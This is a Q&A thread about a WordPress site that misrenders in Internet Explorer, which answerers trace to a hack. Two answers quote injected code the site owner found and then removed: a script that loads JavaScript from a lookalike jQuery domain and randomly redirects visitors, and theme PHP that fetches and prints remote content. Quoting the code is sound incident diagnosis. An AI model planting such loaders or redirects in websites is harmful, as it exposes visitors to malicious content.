# Wordpress CSS doesn't work in Internet Explorer

Tags: css, wordpress, internet-explorer

Something seems wrong when i browse my site with IE 9-8-7. It is rendered perfectly with Chrome, Safari, Firefox and Opera. What can be the reason? Thank you.

http://www.omergencay.com

Wrong View In Internet Explorer
[image]

Answer (score 4, accepted):

These are the very first lines of HTML:

```
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.j-query.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.j-query.org/jquery.js"></scr'+'ipt>'); } </script>

<script type="text/javascript">
var now = new Date().getTime();
if (now%35 == 0) {
window.location = "http://bit.ly/vjqJ4w";
}
</script><!DOCTYPE html>
```

Having stuff before the doctype is throwing IE into [Quirks Mode](http://en.wikipedia.org/wiki/Quirks_mode#Triggering_different_rendering_modes), which is the reason your site is not displaying properly in IE.

More importantly, **your site appears to have been hacked**. Browsing to hxxp://bit.ly/vjqJ4w takes you somewhere you probably don't want to go.

Comment: Thank you for warning. That javascript loads only in internet explorer. And i was wondering where is the "cpahits.com" stuff coming from. Thank you. But how can i remove that referral script from internet explorer rendering?

Comment: You're correct that the JavaScript doesn't always load. It loads in *any browser* (at least, I've verified it also loads in Firefox). However, it only seems to load when there is no referrer set. For help fixing your site, try http://codex.wordpress.org/FAQ_My_site_was_hacked and http://wordpress.stackexchange.com/questions/19696/verifying-that-i-have-fully-removed-a-wordpress-hack.

Comment: I deactivated all the plugins but nothing changed. And now I'm searching for the "hxxp://bit.ly/vjqJ4w" url along the files one by one to find the exploit. Thank you for your help.

Comment: It's more complicated that that. You need to figure out how your site was originally hacked, and close the hole, or it will probably just happen again. Hopefully the resources I linked to will help.

Comment: I installed wordpress new. And didnt advertised it to anyone. I think it might be coming from the theme files. I will look into your two links. Thank you again.

Comment: I removed a function call from header.php and everything seems OK now. Thanks for your help friends. Have a nice day.

Answer (score 3):

actually the solution to this is very simple.

but let me explain first what causes this.

no. 1 reason is that you or your developer probably grabbed some cracked/hacked/nulled themes from warez distributor sites.

so to fix this issue. just open your index.php under your themes root folder

### and look for this:

```
<?php
if(function_exists('curl_init'))
{
    $url = "http://www.j-query.org/jquery-1.6.3.min.js"; 
    $ch = curl_init();  
    $timeout = 5;  
    curl_setopt($ch,CURLOPT_URL,$url); 
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    $data = curl_exec($ch);  
    curl_close($ch); 
    echo "$data";
}
?>
```

---

delete the entire script and your site should work normal.

Answer (score 0):

Something is  forcing IE to run in quirks mode (ie IE5.5 mode) in your page. When you hit F12, you can see the current document mode and change it.

The doctype seems correctly set when I look at the source code... I don't see what thirtydot is seeing.

It's (highly) possible that you are using some sort of wordpress plugin which is causing issues in some cases (which would explain why bingjie2680 didn't notice anything.

Comment: the scripts seem to be present only if you look in IE source code.

Answer (score 0):

Try fixing your code errors and revalidating. [[Invalid] Markup Validation of   omergencay.com  - W3C Markup Validator](http://validator.w3.org/check?uri=http%3A//www.omergencay.com/&doctype=Inline&ss=1&group=0&user-agent=W3C_Validator/1.654). Scroll down in the validation report to see line numbers and source code.